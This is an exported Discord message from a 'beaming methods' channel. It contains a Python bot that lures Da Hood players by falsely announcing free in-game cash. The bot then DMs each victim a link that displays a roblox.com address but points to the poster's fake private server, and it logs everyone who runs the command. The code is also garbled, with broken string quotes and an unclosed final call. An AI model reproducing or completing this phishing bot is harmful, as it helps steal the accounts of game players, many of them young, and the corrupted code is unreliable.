==============================================================
Guild: VAULT ALL LOCKERS NEED |  /prediction
Channel: beaming methods v2 / dhc-bot-method
==============================================================

[PM] xeno#0666
import discord;from discord.ext import commands;import os;from pystyle import *
os.system('title DaHood Logs');os.system("mode con cols=80 lines=40")
link1=' Your fake link private server ';tok='tokenhere'
link2 = link1.split("/games/")[1]
link2 = "https://www.roblox.com/%22+link2
blox = commands.Bot(command_prefix='!');blox.remove_command('help')
@blox.event
async def on_ready():
    print(f"""
{Col.white}[{Col.dark_red}+{Col.white}]{Col.dark_red} Connected To {Col.white}{blox.user.name}
{Col.white}[{Col.dark_red}+{Col.white}]{Col.dark_red} Below, you will see everyone that will use the command
{Col.white}[{Col.dark_red}+{Col.white}]{Col.dark_red} Dahood Cash Command : {Col.white}!dhc
    """)
@blox.command()
async def dhc(ctx):
    print(f"{Col.white}[{Col.dark_red}+{Col.white}]{Col.dark_red} {Col.white}{ctx.author} {Col.dark_red}Is Getting Logged L")
    emb = discord.Embed(title='DaHood Cash Successfully Generated',description=f'Instructions Sent In DMs {ctx.author.mention}.',color=0x1abc9c)
    await ctx.send(embed=emb)
    emb2 = discord.Embed(title='DaHood Cash Successfully Generated',description="Cash has been generated and dropped in this server's bank. Join it within 10 minutes or the cash will be auto picked by a BOT.",color=0x1abc9c)
    emb2.add_field(name="Private Server Link",value=f'[{link2}]({link1})')
    emb2.set_image(url='https://tr.rbxcdn.com/ae7ebc13150aa84723fb98e5e0b9e0a7/768/432/Image/Png%27)
    await ctx.author.send(embed=emb2)
print(f"{Col.white}[{Col.dark_red}+{Col.white}]{Col.dark_red} Connecting To Your Bot..")
blox.run(tok


==============================================================
Exported 1 message(s)
==============================================================
